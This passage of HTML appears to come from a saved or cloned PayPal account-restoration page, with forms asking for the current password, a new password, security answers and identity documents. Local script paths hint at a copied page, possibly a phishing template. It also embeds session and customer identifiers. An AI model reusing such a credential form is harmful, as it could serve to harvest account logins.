			<div class="table-col-xs-2 cardImage-container"><span data-name="" class="rectangleLogo_small shadow  csc-image " aria-hidden="true"></span></div>
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			
			<div class="button-tray"><button name="formSubmit" id="formSubmit" class="vx_btn vx_btn-block vx-modal-component_btn-block" type="submit">Confirm</button></div></div><div class="upload-flow soft-hide"><input type="hidden" name="_csrf" id="csrf" value="B5mcGOVR1OqxqxI/5l9wwHPgvqDu+J9868OPI="><input type="hidden" name="appealStepId" id="appealStepId" value="2"><input type="hidden" name="caseMgmtSystem" id="caseMgmtSystem" value="SCM"><input type="hidden" name="appealId" id="appealId" value="1225583678"> <div id="upload-2_1225583678" class="upload-document"><input type="hidden" id="language" value="en"><input type="hidden" name="country" id="country" value="SG"><input type="hidden" name="fileSizeUnit" id="fileSizeUnit" value="kB"><input type="hidden" name="fileSizeUnitMb" id="fileSizeUnitMb" value="MB"><div id="error-list" class="error-list vx-modal-component-upload-err-wrapper"><p id="FE_DU_010" class="error-msg vx-modal-component-upload-alert">File should be between 10 KB to 5 MB in size.</p><p id="FE_DU_020" class="error-msg vx-modal-component-upload-alert">File should be between 10 KB to 5 MB in size.</p><p id="FE_DU_030" class="error-msg vx-modal-component-upload-alert">File must be a jpg gif png or pdf.</p><p id="FE_DU_050" class="error-msg vx-modal-component-upload-alert">Combined file size must not exceed 10MB. Please remove one or more files to proceed.</p><p id="FE_DU_040" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="FE_DU_060" class="error-msg vx-modal-component-upload-alert">You’ve reached the maximum amount of attachments allowed.</p><p id="FE_DU_070" class="error-msg vx-modal-component-upload-alert"> You must select a response.</p><p id="FE_DU_080" class="error-msg vx-modal-component-upload-alert">You must upload a file or add a link to continue.</p><p id="FE_DU_090" class="error-msg vx-modal-component-upload-alert">You must upload a file.</p><p id="NE_DU_005" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="NE_DU_010" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="NE_DU_020" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_010" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_020" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_030" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_040" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_400" class="error-msg vx-modal-component-upload-alert">We’re sorry, but we’re having trouble uploading your file. Please try again.</p><p id="SE_DU_440" class="error-msg vx-modal-component-upload-alert">We’ve detected a virus in the file you’ve uploaded. Please try again with another file.</p><p id="SE_DU_441" class="error-msg vx-modal-component-upload-alert">You’ve uploaded a file that isn’t a qualified document type. Please upload the right document.</p><p id="SE_DU_442" class="error-msg vx-modal-component-upload-alert">You’ve uploaded a file that’s blurred or is of low quality. Please upload a document with better quality.</p><p id="SE_DU_443" class="error-msg vx-modal-component-upload-alert">The size of the file you’ve uploaded is lesser than the minimum size requirement of 10KB. Please try again with a larger file.</p></div><div id="error-list" class="error-list vx-modal-component-upload-err-wrapper"><p id="FE_DU_100" class="error-msg vx-modal-component-upload-alert">You must add a comment.</p></div><div class="notification-list"><p id="FN_DU_010" class="notification-msg">You’ve successfully uploaded your files. You’re all set.</p></div><div class="classic-experience"><input class="desktopUploadControl" name="desktopUploadControl" type="file" accept="image/jpeg,image/pjpeg,image/png,image/gif,application/pdf"></div><div id="upload-area" class="row upload-area soft-hide"><div class="upload-area-desktop row"><div class="col-sm-12"><div id="desktopUploadArea" class="box drag-and-drop desktopUploadArea"><label for="desktopUploadControl" id="desktopUploadButton" class="upload-button"><span class="full-experience">Drag and drop</span><span class="classic-experience">Upload file</span></label></div></div></div><div class="requirement-desktop row"><div class="col-sm-4 col-xs-4 desktopUploadButton"><a href="">Browse Files</a></div><div class="col-sm-7 col-xs-7 requirement">JPG GIF PNG PDF | 5 MB each</div></div></div><div class="preview-row row"><div class="col-md-12 preview-area-wrap"><div id="preview-area" class="preview-area desktop row soft-hide"><div id="filePreview" class="filePreview soft-hide drag-and-drop"><div id="fileInfo" class="fileInfo">File name:</div><a href="#"><span class="remove-file"></span></a></div></div></div></div><div style="display:none" class="vx_text-body-md vx-modal-component_text-body-md document-link-area" id="document-link-area"><div class="or-wrap"><h3><span class="or-wrap-content">Or</span></h3></div><br><p id="linkToDocumentText" class="linkToDocumentHeadText">Provide a link to your document</p><br><div class="textInput long"><input type="text" placeholder="Enter document URL" id="linkToDocument" name="linkToDocument" class="form-control vx_form-control vx-modal-component-input-text hasHelp validate" autocomplete="off" maxlength="200"><label for="linkToDocument" class="linkToDocumentTextLabel">For example: http://www.yourwebsite.com.au/document_name.html</label></div><br></div><div><button name="uploadSubmit-ship" class="vx_btn vx_btn-block vx-modal-component_btn-block uploadSubmit-ship">Submit</button><button name="uploadSubmit" class="vx_btn vx_btn-block vx-modal-component_btn-block vx-uploadSubmit">Submit</button><button class="vx_btn vx_btn-secondary vx_btn-block vx-modal-component_btn-secondary appealstep-close-vx">Cancel</button></div></div><p class="link"><a id="online-link">Confirm online instead</a></p></div></form></div><div class="page"><div class="contents"><div class="loading"></div></div></div></div></div></div>                                    <div class="appealstep-button"><button id="appealstep-2" class="vx_btn vx_modal-trigger btn btn-primary btn-sm appealstep-2" data-modal-id="confirmCardModal-2_1225583678">Resolve</button></div></div></div></div><div class="appealstep-wrapper "><div class="appealstep-details row"><div class="appealstep-header col-md-8 col-sm-8 col-xs-8"></div><div class="appealstep-action col-md-4 col-sm-4 col-xs-4"><div><div id="securityInfoModal-9_1225583680" class=" vx_modal-glimpse vx-modal-component-modal-outer securityInfoModal appealstep-modal-outer" tabindex="-2" role="dialog" aria-labelledby="securityInfoModal" aria-hidden="true" data-backdrop="static" data-keyboard="false">    <div class="vx_modal-wrapper vx-modal-component-modal-wrapper"><div class="logo vx-modal-component-modal-logo"></div><button class="vx_modal-dismiss_x vx-modal-component-dismiss-x appealstep-close" data-modal-id="securityInfoModal-9_1225583680"><span class="vx_a11yText">Close</span></button><div class="vx_modal-content vx-modal-component-content">                        <p class="vx_text-1 vx-modal-component_HeadText-1">Update your security info</p> <div id="error-list" class="vx-modal-component-upload-err-wrapper"><p id="PIMP_RC_REFUSED_PASSWORD_TOO_SHORT" class="error-msg vx-modal-component-upload-alert">Your password is too short.</p><p id="PIMP_RC_REFUSED_PASSWORD_RETYPE_NOT_MATCH" class="error-msg vx-modal-component-upload-alert">The passwords you entered don't match. Please try again.</p><p id="PIMP_RC_REFUSED_PASSWORD_SAME_AS_OLD" class="error-msg vx-modal-component-upload-alert">You must use a different password from your current one.</p><p id="PIMP_RC_REFUSED_PASSWORD_ILLEGAL_CHARACTER" class="error-msg vx-modal-component-upload-alert">Your password contains characters that cannot be used.</p><p id="PIMP_RC_REFUSED_PASSWORD_CONTAINS_FORBIDDEN_WORD" class="error-msg vx-modal-component-upload-alert">Your password is too easy to guess.</p><p id="PRIVATE_CREDENTIAL_OLD_VALUE_MISMATCH" class="error-msg vx-modal-component-upload-alert">Please check your current password.</p><p id="SECONDARY_USER_NOT_AUTHORIZED" class="error-msg vx-modal-component-upload-alert">You are not authorized to make these changes to the account.</p><div class="row"><div class="col-sm-12"><div class="col-sm-1 pin-invalid" style="display: none; height: 60px; width: 50px;background: url('https://www.paypalobjects.com/webstatic/restoreaccessnodeweb/generic_sprite_1x.png') no-repeat -12% -768px;"></div><p id="MOBILE_PIN_INVALID" class="error-msg vx-modal-component-upload-alert">That PIN can't be used. Please create a mobile PIN consisting of 4-8 unique numbers. Make sure your mobile PIN is memorable to you but difficult for others to guess.</p></div></div><p id="UDS_PASSWORD_SAME_AS_OLD" class="error-msg vx-modal-component-upload-alert">You can't use your current password. Please try something else.</p><p id="GENERAL" class="error-msg vx-modal-component-upload-alert">Sorry, we’re having trouble processing your request. Please try again.</p><p id="UNKNOWN" class="error-msg vx-modal-component-upload-alert">There seems to be a problem with your request. Please contact us for assistance.</p></div><form id="securityQuestions-form" class="upload-form" method="POST" data-auto-disable="false" autocomplete="off"><input type="hidden" name="_csrf" id="csrf" value="B5mcGOVR1OqxqxI/5l9wwHPgvqDu+J9868OPI="><input type="hidden" name="isPassword" id="isPassword" value="true"><input type="hidden" name="isQuestion" id="isQuestion" value="true"><input type="hidden" name="isPin" id="isPin" value=""> <div class="password-tray"><div><p class="head vx-modal-component_subHeadText">Step 1 - Create a new password</p></div><div><p class="description linkToDocumentHeadText">To make your account more secure, use a combination of letters and numbers.</p></div>          <div class="textInput vx-textInput vx_floatingLabel_active vx-modal-component-input-font-style vx-modal-component-input-wrap" data-label-content="Current password"><label for="currentPassword">Current password</label><input type="password" id="currentPassword" value="" name="currentPassword" class="hasHelp validate form-control vx_form-control vx-modal-component-input-text securityInfo-inputText" autocomplete="off"></div><div class="textInput vx-textInput long vx_floatingLabel_active vx-modal-component-input-font-style vx-modal-component-input-wrap" data-label-content="New password"> <label for="newPassword">New password</label><input type="password" id="newPassword" value="" name="newPassword" class="hasHelp validate form-control vx_form-control vx-modal-component-input-text securityInfo-inputText" autocomplete="off" maxlength="20"></div><div class="textInput vx-textInput long vx_floatingLabel_active vx-modal-component-input-font-style vx-modal-component-input-wrap" data-label-content="Re-enter password"> <label for="confirmPassword">Re-enter password</label><input type="password" id="confirmPassword" value="" name="confirmPassword" class="hasHelp validate form-control vx_form-control vx-modal-component-input-text securityInfo-inputText" autocomplete="off" maxlength="20"></div></div><div class="question-tray"> <p class="head vx-modal-component_subHeadText">Step 2 - Choose new security questions</p> <div class="question-section"><div class="nativeDropdown enhanced"><label for="security questions 1"></label><div class="selectDropdown validate form-group"><select id="securityQuestion1" name="securityQuestion1" class="form-control vx_form-control vx-modal-component-select doc-upload-select uber-vx_select"><option value="" selected="">Select a question</option></select></div></div>  <div class="textInput vx-textInput long vx_floatingLabel_active vx-modal-component-input-font-style vx-modal-component-input-wrap" data-label-content="Enter answer"> <label for="securityAnswer1">Enter answer</label> <input type="text" id="securityAnswer1" value="" name="securityAnswer1" class="hasHelp validate form-control vx_form-control vx-modal-component-input-text securityInfo-inputText" autocomplete="off">  </div></div><div class="question-section"><div class="nativeDropdown enhanced"><label for="security questions 2"></label><div class="selectDropdown validate form-group"><select id="securityQuestion2" name="securityQuestion2" class="form-control vx_form-control vx-modal-component-select doc-upload-select uber-vx_select"><option value="" selected="">Select a question</option></select></div></div>  <div class="textInput vx-textInput long vx_floatingLabel_active vx-modal-component-input-font-style vx-modal-component-input-wrap" data-label-content="Enter answer"> <label for="securityAnswer2">Enter answer</label> <input type="text" id="securityAnswer2" value="" name="securityAnswer2" class="hasHelp validate form-control vx_form-control vx-modal-component-input-text securityInfo-inputText" autocomplete="off">  </div></div></div><div><button name="formSubmit" id="formSubmit" class="vx_btn vx_btn-block vx-modal-component_btn-block vx-securityInfo_btn-block" type="submit">Submit</button><button class="vx_btn vx_btn-secondary vx_btn-block vx-modal-component_btn-secondary appealstep-close-vx">Cancel</button></div></form>   </div><div class="page"><div class="contents"><div class="loading"></div></div></div></div></div></div>                                    <div class="appealstep-button"></div></div></div></div></div>        </div></div></div></div>                                                    </div></div></div><div id="securedone" class="modal fade appealstep-modal-outer" tabindex="-1" role="dialog" aria-labelledby="proofIdModal" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="modal-dialog modal-lg"><div id="uploadModalOutlay" class="modal-content appealstep-modal"><div class="done-tray"><div class="done-img-tray"></div><div class="done-content"><input type="hidden" name="_csrf" id="donecsrf" value="B5mcGOVR1OqxqxI/5l9wwHPgvqDu+J9868OPI="><div class="doneHeading">Your security details have been updated successfully</div><div class="doneContent">You'll need to log in with your new password.</div>  </div></div><div class="logo"></div></div></div></div><div id="confirmIdentityError" class="modal fade appealstep-modal-outer" tabindex="-1" role="dialog" aria-labelledby="confirmIdentityError" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="modal-dialog modal-lg"><div class="modal-content appealstep-modal"><div class="done-tray"><div class="identity-error-img"></div><div class="done-content"><div class="doneHeading">We are not able to confirm your Identity online</div><div class="doneContent">Please use file upload option</div>  </div><div class="done-btn"><button name="close" data-dismiss="modal" class="btn btn-primary continue" pa-marked="1">Continue </button></div></div></div><div class="logo"></div></div></div> <div><div class="vx_globalFooter"><div class="vx_globalFooter-content"><ul class="vx_globalFooter-list"><li><a href="/smarthelp/home" class="js_contextualHelp" data-pagename="" data-name="footer-help" name="footer-help" id="footer-help" pa-marked="1">Help</a></li><li><a href="/smarthelp/contact-us" data-pagename="" data-name="footer-contact" name="footer-contact" id="footer-contact" pa-marked="1">Contact Us</a></li><li><a href="/webapps/mpp/paypal-safety-and-security" data-pagename="" data-name="footer-security" name="footer-security" id="footer-security" pa-marked="1">Security</a></li></ul><div class="vx_globalFooter_secondary"><p class="vx_globalFooter-copyright">©<span dir="ltr">1999-2020</span> PayPal, Inc. All rights reserved.</p><ul class="vx_globalFooter-list_secondary"><li><a href="/webapps/mpp/ua/privacy-full" data-pagename="" data-name="footer-privacy" name="footer-privacy" id="footer-privacy" pa-marked="1">Privacy</a></li><li><a href="/webapps/mpp/ua/legalhub-full" data-pagename="" data-name="footer-legal" name="footer-legal" id="footer-legal" pa-marked="1">Legal</a></li></ul></div></div></div></div></div></div><script type="text/javascript" src="https://www.paypalobjects.com/pa/js/min/pa_thirdparty.js"></script><script src="https://www.paypalobjects.com/pa/js/pa.js"></script><script nonce="">(function(){if(typeof PAYPAL.analytics != "undefined"){PAYPAL.core = PAYPAL.core || {};PAYPAL.core.pta = PAYPAL.analytics.setup({data:'pgrp\u003drestoreaccessnodeweb\u00252Fpublic\u00252Ftemplates\u00252Fdashboard\u002edust\u002edust\u0026page\u003drestoreaccessnodeweb\u00252Fpublic\u00252Ftemplates\u00252Fdashboard\u002edust\u002edust\u0026pgst\u003d1592303724516\u0026calc\u003d92ed64468bea9\u0026nsid\u003d5bL3MCDGHdfAOu6uQQ67ZQk3mW6IMN0m\u0026rsta\u003den_GB\u0026pgtf\u003dNodejs\u0026env\u003dlive\u0026s\u003dci\u0026ccpg\u003dSG\u0026csci\u003d2d4896edb55f4aaea7437f495eb22099\u0026comp\u003drestoreaccessnodeweb\u0026tsrce\u003dbizcomponentsnodeweb\u0026cu\u003d1\u0026gacook\u003d1356228883\u002e1592301343\u0026pxpguid\u003dbc8da61e1720a95008b41208ffff33f5\u0026cust\u003d4ZB8LQDJTX8XU\u0026party_id\u003d4ZB8LQDJTX8XU\u0026acnt\u003dbusiness\u0026aver\u003dunverified\u0026rstr\u003dunrestricted\u0026cnac\u003dSG', url:'https\u003a\u002f\u002ft\u002epaypal\u002ecom\u002fts'});}}());</script><noscript><img src="https:https://t.paypal.com/ts?nojs=1&pgrp=restoreaccessnodeweb%2Fpublic%2Ftemplates%2Fdashboard.dust.dust&page=restoreaccessnodeweb%2Fpublic%2Ftemplates%2Fdashboard.dust.dust&pgst=1592303724516&calc=92ed64468bea9&nsid=5bL3MCDGHdfAOu6uQQ67ZQk3mW6IMN0m&rsta=en_GB&pgtf=Nodejs&env=live&s=ci&ccpg=SG&csci=2d4896edb55f4aaea7437f495eb22099&comp=restoreaccessnodeweb&tsrce=bizcomponentsnodeweb&cu=1&gacook=1356228883.1592301343&pxpguid=bc8da61e1720a95008b41208ffff33f5&cust=4ZB8LQDJTX8XU&party_id=4ZB8LQDJTX8XU&acnt=business&aver=unverified&rstr=unrestricted&cnac=SG" alt="" height="1" width="1" border="0"></noscript><script nonce="">window.validationMessages = {"businessNameError":"You must enter your business name.","supplierNameError":"You must enter the supplier's name.","required":"Required.","validPhoneCheck":"Please check your phone number and try again.","validMobilePinCheck":"Your PIN should be 4-8 digits.","emailValidation":"Please check the email address and try again.","urlCheck":"Please check the URL and try again.","selectOption":"Please select an option.","validShipmentTrackingNumber":"Please check your tracking number and try again.","min8CharRequirement":"Please enter at least 8 characters.","numberSymbolRequirement":"Please include at least 1 number or symbol (!@#$%^).","passwordSequenceCheck":"You can't use 4 sequential characters (1234, qwer).","passwordRepeatedCharCheck":"You can't use 4 repeated characters (1111, aaaa).","noSpaceCharRestriction":"Please don't include any spaces.","matchPasswords":"Your passwords don't match. Please try again.","validOtherCarrierName":"You must enter the carrier name","requiredPhoneCheck":"You must enter a phone number.","requiredEmailCheck":"You must enter an email address.","countrySelectCheck":"You must enter a country or region.","businessAddressCheck":"You must enter the business address.","requiredCurrentPassword":"Please check your current password.","requiredNewPassword":"You must enter a new password.","passwordValidation":"Your password must be at least 8 characters long. It must include at least 1 number or special character.","securityQuestionCheck":"You must choose a security question.","answerCheck":"You must enter an answer.","mobilePinCheck":"You must enter a valid PIN. Your PIN must have 4-8 digits.","passwordRepeatedCheckBy2Chars":"Don't use 2 repeated characters (121212)."};</script><script nonce="" type="text/javascript">var require = {paths: {"_languagepack": document.documentElement.getAttribute('data-langpack')},waitSeconds: 60};            </script><script src="js/lib/require.js"></script><script src="js/lib/wow.min.js"></script><script nonce="">new WOW().init();</script><script src="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/js/vendor.bundle.js"></script><script src="https://www.paypalobjects.com/web/res/ce8/02836256934b386890fa5d155e320/js/app.bundle.js"></script>	<div id="actionsContainer"><div id="actions" class=" modal fade" role="dialog" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="modal-dialog modal-lg"><div class="modal-content"><div class="row modal-close" id="modal-close-div">		<a href="" class="a-close actions-close-btn" id="modal-close-btn" data-dismiss="modal" pa-marked="1"></a></div><div class="impact-row"><p class="impact-header">What is the impact on your account?</p><div class="impact-day"><div class="col-md-7 col-sm-7 col-xs-7 impact-filler"></div><div class="col-md-5 col-sm-5 col-xs-5 no-escalation-impact-today-filler"><p class="no-esc-today">Today</p></div></div><div class="impact-table alternate-row"><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Withdraw money from PayPal</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Send money or payments</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Refund money to customers</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Pay using PayPal</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Close PayPal account</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Remove debit or credit card</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Remove bank account</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Add money to PayPal account</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Receive money or payments</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Add bank account</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Add debit or credit card</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Update your profile</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Display PayPal logos on site or auction</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div><div class="row row-details"><div class="col-md-7 col-sm-7 col-xs-7 impact-action">Convert currencies</div><div class="col-md-5 col-sm-5 col-xs-5 impact-col today"><span class="not-blocked-ico-md"></span></div></div></div><div class="button-tray">                   <button name="close" data-dismiss="modal" class="vx_btn vx_btn-secondary actions-btn actions-close-btn" pa-marked="1">Close </button></div></div><div class="logo"></div></div></div></div></div><div id="submissionInfoContainer"></div><div class="modal fade confirm-box-outer" id="confirm-box-outer" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static" data-keyboard="false"><div class="modal-dialog"><div class="modal-content confirm-box-inner"><div class="confirm-box-content"><div class="confirm-box-head">Are you sure?</div><div class="confirm-box-text">If you leave this page instead of submitting, you'll lose all the information you provided.</div><div class="row button-tray"><button class="confirm-leave btn btn-primary" pa-marked="1">Leave Now</button><input class="confirm-back btn btn-light backButton" value="Back"></div></div></div></div></div><div class=" vx_modal-glimpse vx-modal-component-modal-outer confirmSubmission-modal-outer appealstep-modal-outer" role="dialog" aria-describedby="confirmSubmissionModal-header" id="confirmSubmissionModal"><div class="vx_modal-wrapper vx-modal-component-modal-wrapper confirmSubmission-modal-wrapper"><div class="logo vx-modal-component-modal-logo confirmSubmission-modal-logo"></div><button class="vx_modal-dismiss_x vx-modal-component-dismiss-x confirmSubmission-dismiss-x confirmSubmission-close-action vx-confirm-back" data-modal-id="confirmSubmissionModal" pa-marked="1"><span class="vx_a11yText">Close</span></button><div class="vx_modal-content vx-modal-component-content confirmSubmission-content">  <h2 class="vx_text-1 vx-modal-component_HeadText-1 confirmSubmission_text-1">Are you sure?</h2><p class="vx_text-body-md vx-modal-component_text-para confirmSubmission_text-para">If you leave this page instead of submitting, you'll lose all the information you provided.</p><div class="done-btn"><button class="vx_btn vx_btn-block vx-modal-component_btn-block vx-confirm-leave" pa-marked="1">Leave Now</button><input class="vx_btn vx_btn-secondary vx_btn-block vx-modal-component_btn-secondary vx-confirm-back" value="Back"></div></div></div></div><script crossorigin="anonymous" src="https://www.paypalobjects.com/pa/3pjs/tl/5.6.1/patleaf.js"></script><div id="node-chat" style="background-color: white; width: 374px; z-index: 110000; position: fixed; height: 525px; visibility: hidden; overflow: hidden; bottom: 10px; right: -394px; transition: right 0.6s ease 0s, height 0.6s ease 0s; box-shadow: rgb(104, 113, 115) 0px 0px 10px;"></div><script crossorigin="anonymous" src="https://www.paypalobjects.com/pa/3pjs/tl/5.6.1/patlcfg.js"></script></body></html>